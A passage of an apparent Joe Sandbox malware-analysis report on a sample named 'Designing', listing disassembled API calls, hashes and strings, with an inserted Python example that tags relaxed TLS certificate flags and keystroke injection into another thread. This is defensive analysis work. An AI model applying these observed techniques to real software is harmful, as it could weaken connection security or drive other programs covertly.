                                              • SelectObject.GDI32(00000000,00000000), ref: 00B6D094
                                              • SelectObject.GDI32(00000000,00000000), ref: 00B6D0A9
                                              • ReleaseDC.USER32(?,00000000), ref: 00B6D0B1
                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00B6D13C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                              • String ID: U
                                              • API String ID: 4009187628-3372436214
                                              • Opcode ID: b642c0df1fc42f1d73c2c8b9a0aa2ceca812814b3ecc2048df733a45b3a41a25
                                              • Instruction ID: b87e1b64325076410db21c49047ac8efa4e5fae09fe0506628b2ba7210e5a50e
                                              • Opcode Fuzzy Hash: b642c0df1fc42f1d73c2c8b9a0aa2ceca812814b3ecc2048df733a45b3a41a25
                                              • Instruction Fuzzy Hash: DC71AD30A00205EFCF219F64CC94AAA7BF5FF49360F2442E9ED559B165CB358981DB60
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                                • Part of subcall function 00B32714: GetCursorPos.USER32(?), ref: 00B32727
                                                • Part of subcall function 00B32714: ScreenToClient.USER32(00BF77B0,?), ref: 00B32744
                                                • Part of subcall function 00B32714: GetAsyncKeyState.USER32(00000001), ref: 00B32769
                                                • Part of subcall function 00B32714: GetAsyncKeyState.USER32(00000002), ref: 00B32777
                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00BBC69C
                                              • ImageList_EndDrag.COMCTL32 ref: 00BBC6A2
                                              • ReleaseCapture.USER32 ref: 00BBC6A8
                                              • SetWindowTextW.USER32(?,00000000), ref: 00BBC752
                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00BBC765
                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00BBC847
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                              • API String ID: 1924731296-2107944366
                                              • Opcode ID: 0dc741019134966c5b8de0b69e9170bb09cbd30864e1297a195989b0e6b8ee7c
                                              • Instruction ID: aa6234f98f259c39375f86817a499167c555f47112b0efa5e79ea967733396f4
                                              • Opcode Fuzzy Hash: 0dc741019134966c5b8de0b69e9170bb09cbd30864e1297a195989b0e6b8ee7c
                                              • Instruction Fuzzy Hash: 11516A71608204AFD700EF15CC59FBA7BE5EB88310F1049A9F9958B2A1CF70AD49CB62
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BA211C
                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BA2148
                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BA218A
                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BA219F
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA21AC
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00BA21DC
                                              • InternetCloseHandle.WININET(00000000), ref: 00BA2223
                                                • Part of subcall function 00BA2B4F: GetLastError.KERNEL32(?,?,00BA1EE3,00000000,00000000,00000001), ref: 00BA2B64
                                                • Part of subcall function 00BA2B4F: SetEvent.KERNEL32(?,?,00BA1EE3,00000000,00000000,00000001), ref: 00BA2B79
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                              • String ID:
                                              • API String ID: 2603140658-3916222277
                                              • Opcode ID: 5f5413aef2579637426453b32e21f53da5ae312ceff34f9fb2910bbc04c8aa60
                                              • Instruction ID: 0a987301b6ce697a4ca4b4d1a56e185699eed2ece3bb656f9d93425aee75d87f
                                              • Opcode Fuzzy Hash: 5f5413aef2579637426453b32e21f53da5ae312ceff34f9fb2910bbc04c8aa60
                                              • Instruction Fuzzy Hash: 77418EB1508208BFEB169F54CC89FBB7BECEF09354F004196FA05AA141DB709E448BA0
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00BC0980), ref: 00BA9412
                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00BC0980), ref: 00BA9446
                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00BA95C0
                                              • SysFreeString.OLEAUT32(?), ref: 00BA95EA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                              • String ID:
                                              • API String ID: 560350794-0
                                              • Opcode ID: dce572e1fb342a396c68f4a9394d4fd160f13f4a31afabd0811fdbba725aeb3c
                                              • Instruction ID: d089d3f910eead85c580d628543fe658871f0894ef98b5da6577b5fc490f7f7f
                                              • Opcode Fuzzy Hash: dce572e1fb342a396c68f4a9394d4fd160f13f4a31afabd0811fdbba725aeb3c
                                              • Instruction Fuzzy Hash: 5EF12C71A04209EFCF14DF94C884EAEB7B9FF4A314F148498F916AB251DB31AE45DB60
                                              APIs
                                              • _memset.LIBCMT ref: 00BAFD9E
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BAFF31
                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00BAFF55
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BAFF95
                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00BAFFB7
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00BB0133
                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00BB0165
                                              • CloseHandle.KERNEL32(?), ref: 00BB0194
                                              • CloseHandle.KERNEL32(?), ref: 00BB020B
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                              • String ID:
                                              • API String ID: 4090791747-0
                                              • Opcode ID: 1d8965933dcaf76f03ff7da577ae9542951fc74b4c1f596bbd971a7aacfba3d3
                                              • Instruction ID: 35345e49ba593f0e5fcdfa2ec32c2db6c491c806fd96b367eaaf82a80e3148dd
                                              • Opcode Fuzzy Hash: 1d8965933dcaf76f03ff7da577ae9542951fc74b4c1f596bbd971a7aacfba3d3
                                              • Instruction Fuzzy Hash: 71E181316083419FC715EF24C891B7ABBE1EF85314F1485ADF8899B2A2CB71EC45CB52
                                              APIs
                                                • Part of subcall function 00B94BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B93B8A,?), ref: 00B94BE0
                                                • Part of subcall function 00B94BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B93B8A,?), ref: 00B94BF9
                                                • Part of subcall function 00B94FEC: GetFileAttributesW.KERNELBASE(?,00B93BFE), ref: 00B94FED
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00B952FB
                                              • _wcscmp.LIBCMT ref: 00B95315
                                              • MoveFileW.KERNEL32(?,?), ref: 00B95330
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                              • String ID:
                                              • API String ID: 793581249-0
                                              • Opcode ID: fb5dcaf38b4e39b57e6845f3105b4cac4236916c3fadc78c50e3c21ddbd92131
                                              • Instruction ID: 1c2129ebf65b918239f931cb4a132e743d62b7eb2a536868d39554459b01f25e
                                              • Opcode Fuzzy Hash: fb5dcaf38b4e39b57e6845f3105b4cac4236916c3fadc78c50e3c21ddbd92131
                                              • Instruction Fuzzy Hash: 0F5185B24083859BCB75DB64DC81EDBB3ECDF84301F00496EB589D3152EF34A6888766
                                              APIs
                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00BB8D24
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: InvalidateRect
                                              • String ID:
                                              • API String ID: 634782764-0
                                              • Opcode ID: a6b8c2f733f8135165ace184d5c73d1d6ad26599e2185dd4d55e7ebbc608d4a1
                                              • Instruction ID: 7d25c420bc374078c237666a53e5ae081a39061e51c6735fd8dd3e07dc4b5429
                                              • Opcode Fuzzy Hash: a6b8c2f733f8135165ace184d5c73d1d6ad26599e2185dd4d55e7ebbc608d4a1
                                              • Instruction Fuzzy Hash: C6517E70640204BFEB249F28DC85BF97BE8EB05350F2445A6F514E71E1CFB1E950DA50
                                              APIs
                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00B6C638
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B6C65A
                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00B6C672
                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00B6C690
                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00B6C6B1
                                              • DestroyIcon.USER32(00000000), ref: 00B6C6C0
                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00B6C6DD
                                              • DestroyIcon.USER32(?), ref: 00B6C6EC
                                                • Part of subcall function 00BBAAD4: DeleteObject.GDI32(00000000), ref: 00BBAB0D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                              • String ID:
                                              • API String ID: 2819616528-0
                                              • Opcode ID: 37ef8115054d2905b1873c8b97c45e7854be9475edcc72e5dbae0477d8f54cdd
                                              • Instruction ID: e47f0a2157c8d2b9ff8adb3a708a6f44280874dfe9b8d047c20d4fc98bbc59ea
                                              • Opcode Fuzzy Hash: 37ef8115054d2905b1873c8b97c45e7854be9475edcc72e5dbae0477d8f54cdd
                                              • Instruction Fuzzy Hash: 41517970610209EFDB24DF24CC85FBA7BF5EB48710F2046A8F94697290DB70AD90DB60
                                              APIs
                                                • Part of subcall function 00B8B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8B54D
                                                • Part of subcall function 00B8B52D: GetCurrentThreadId.KERNEL32 ref: 00B8B554
                                                • Part of subcall function 00B8B52D: AttachThreadInput.USER32(00000000,?,00B8A23B,?,00000001), ref: 00B8B55B
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B8A246
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B8A263
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00B8A266
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B8A26F
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B8A28D
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B8A290
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00B8A299
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B8A2B0
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00B8A2B3
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              • Opcode ID: 57fd3c79d161a3d2c45f53a9b46ff8b32a04a91786367425f5ad85e81875fa5b
                                              • Instruction ID: 2800b97613261de30af03aa475c0a83a48c372ec2121603aa2c4f86005c3ef4a
                                              • Opcode Fuzzy Hash: 57fd3c79d161a3d2c45f53a9b46ff8b32a04a91786367425f5ad85e81875fa5b
                                              • Instruction Fuzzy Hash: 3411CEB1960218FEF6207F649C8AF6A7A6DEB4C750F110419F3506B0A0CEF36C50DBA0
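Two of the call listings above are the kind an analyst lifts out of a report like this to build a behaviour signature: the WinINet routine at 00BA211C to 00BA2223, which reads and rewrites INTERNET_OPTION_SECURITY_FLAGS (option 0x1F) on the request handle before HttpSendRequestW, and the routine at 00B8A246 to 00B8A2B3, which attaches to another thread's input queue and posts WM_KEYDOWN/WM_KEYUP (0x100/0x101) for VK_LEFT and VK_RIGHT (0x25/0x27). The Python below is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in exactly the format of the "APIs" blocks (api.MODULE(operands), ref: address, with the "Part of subcall function" prefix), decodes only the Win32 constants named here, and tags the two behaviours. The tag names are the example's own; the embedded input is an abridged copy of the two listings; the 0x100 operand passed to InternetSetOptionW is deliberately not decoded, because the listing shows raw operands and its role as the flags value is not confirmed by the report.

```python
# Added example: parse Joe Sandbox IDA-plugin API listings (the "APIs" blocks in
# this report) and tag behaviour patterns. Tag names are this example's own.
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import List, Optional, Set, Tuple

# One listing line, e.g.
#   • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00B6D086
#   • Part of subcall function 00BA2B4F: SetEvent.KERNEL32(?,?), ref: 00BA2B79
#   • _memset.LIBCMT ref: 00BAFD9E
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Win32 constants used by the rules (values from the Windows SDK headers).
WM_KEYDOWN, WM_KEYUP = 0x0100, 0x0101
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
VK_NAMES = {0x25: "VK_LEFT", 0x26: "VK_UP", 0x27: "VK_RIGHT", 0x28: "VK_DOWN"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]   # operands as printed: hex immediates or '?' (unknown)
    ref: int                # call-site address
    subcall: Optional[int]  # callee address when listed as part of a subcall

    def arg_int(self, index: int) -> Optional[int]:
        """Operand `index` as an unsigned 32-bit int, None if unknown or absent."""
        if index >= len(self.args) or self.args[index] == "?":
            return None
        return int(self.args[index], 16) & 0xFFFFFFFF


def parse_line(line: str) -> Optional[ApiCall]:
    """Parse one line; None for headers and anything that is not an API entry."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = tuple(a.strip() for a in (m.group("args") or "").split(",") if a.strip())
    sub = m.group("sub")
    return ApiCall(m.group("api"), m.group("module"), args,
                   int(m.group("ref"), 16), int(sub, 16) if sub else None)


def parse_block(text: str) -> List[ApiCall]:
    """Parse an 'APIs' block, keeping listing order (the static call order)."""
    return [c for c in map(parse_line, text.splitlines()) if c is not None]


def keystroke_sequence(calls: List[ApiCall]) -> List[Tuple[str, str]]:
    """Key events synthesised via PostMessageW(hwnd, WM_KEYDOWN|WM_KEYUP, vk, lParam)."""
    events = []
    for c in calls:
        msg, vk = c.arg_int(1), c.arg_int(2)
        if c.api == "PostMessageW" and msg in (WM_KEYDOWN, WM_KEYUP) and vk is not None:
            events.append(("down" if msg == WM_KEYDOWN else "up",
                           VK_NAMES.get(vk, f"VK_{vk:02X}")))
    return events


def classify(calls: List[ApiCall]) -> Set[str]:
    """Behaviour tags for one function's call list (tag names are this example's)."""
    names = {c.api for c in calls}
    tags: Set[str] = set()
    if {"InternetConnectW", "HttpOpenRequestW", "HttpSendRequestW"} <= names:
        # The TLS security flags of the request handle are read and then rewritten
        # before the request goes out, so certificate validation may be relaxed.
        rewritten = any(c.api == "InternetSetOptionW"
                        and c.arg_int(1) == INTERNET_OPTION_SECURITY_FLAGS for c in calls)
        tags.add("wininet_request_security_flags_rewritten" if rewritten
                 else "wininet_request")
    if "AttachThreadInput" in names and keystroke_sequence(calls):
        # Input queue attached to another thread, then key messages posted to it.
        tags.add("synthetic_keystrokes")
    return tags


# Input: abridged copies of the 00BA211C WinINet listing and the 00B8A246 keystroke
# listing from this report, embedded so the example runs offline.
WININET_BLOCK = """\
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BA211C
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00BA2148
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00BA218A
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00BA219F
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BA21AC
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00BA21DC
• InternetCloseHandle.WININET(00000000), ref: 00BA2223
  • Part of subcall function 00BA2B4F: GetLastError.KERNEL32(?,?,00BA1EE3,00000000,00000000,00000001), ref: 00BA2B64
  • Part of subcall function 00BA2B4F: SetEvent.KERNEL32(?,?,00BA1EE3,00000000,00000000,00000001), ref: 00BA2B79
"""
KEYSTROKE_BLOCK = """\
  • Part of subcall function 00B8B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8B54D
  • Part of subcall function 00B8B52D: GetCurrentThreadId.KERNEL32 ref: 00B8B554
  • Part of subcall function 00B8B52D: AttachThreadInput.USER32(00000000,?,00B8A23B,?,00000001), ref: 00B8B55B
• MapVirtualKeyW.USER32(00000025,00000000), ref: 00B8A246
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00B8A263
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00B8A28D
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00B8A2B0
"""
```

Running parse_block on each block and passing the result to classify yields the single tag wininet_request_security_flags_rewritten for the first listing and synthetic_keystrokes for the second; keystroke_sequence on the second recovers down VK_LEFT, down VK_RIGHT, up VK_RIGHT. Operands printed as "?" stay None rather than being guessed, so a rule never fires on an unknown value.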
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00B8915A,00000B00,?,?), ref: 00B894E2
                                              • HeapAlloc.KERNEL32(00000000,?,00B8915A,00000B00,?,?), ref: 00B894E9
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00B8915A,00000B00,?,?), ref: 00B894FE
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00B8915A,00000B00,?,?), ref: 00B89506
                                              • DuplicateHandle.KERNEL32(00000000,?,00B8915A,00000B00,?,?), ref: 00B89509
                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00B8915A,00000B00,?,?), ref: 00B89519
                                              • GetCurrentProcess.KERNEL32(00B8915A,00000000,?,00B8915A,00000B00,?,?), ref: 00B89521
                                              • DuplicateHandle.KERNEL32(00000000,?,00B8915A,00000B00,?,?), ref: 00B89524
                                              • CreateThread.KERNEL32(00000000,00000000,00B8954A,00000000,00000000,00000000), ref: 00B8953E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                              • String ID:
                                              • API String ID: 1957940570-0
                                              • Opcode ID: 2bd485992641e802c49164ec91b77f6621d7528baec2c61354aa6883ef97d8d0
                                              • Instruction ID: d4408d103a1e5fe9e783965e480654b8fdac453528706e0414e1204695f28b39
                                              • Opcode Fuzzy Hash: 2bd485992641e802c49164ec91b77f6621d7528baec2c61354aa6883ef97d8d0
                                              • Instruction Fuzzy Hash: BC01BBB5250304FFE710ABA5DC4DF6B7BACEB89711F044411FA05DB1A1CA709800CB20
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: NULL Pointer assignment$Not an Object type
                                              • API String ID: 0-572801152
                                              • Opcode ID: 542170597cdf49c2066b360e39655d08d5e136e132c3b9a516a74195ccc28cf8
                                              • Instruction ID: 0404943c96d00a523095ac2ba6c10ccc1056a147c248b6fac57a17134519410d
                                              • Opcode Fuzzy Hash: 542170597cdf49c2066b360e39655d08d5e136e132c3b9a516a74195ccc28cf8
                                              • Instruction Fuzzy Hash: AEC19171E0421A9FDF14DFA8C884BAEB7F5FB59314F1484A9E905AB280E770ED44CB61
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                               • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmp
                                               • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$_memset
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2862541840-625585964
                                              APIs
                                                • Part of subcall function 00B87D28: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?,?,00B88073), ref: 00B87D45
                                                • Part of subcall function 00B87D28: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B87C62,80070057,?,?), ref: 00B87D60
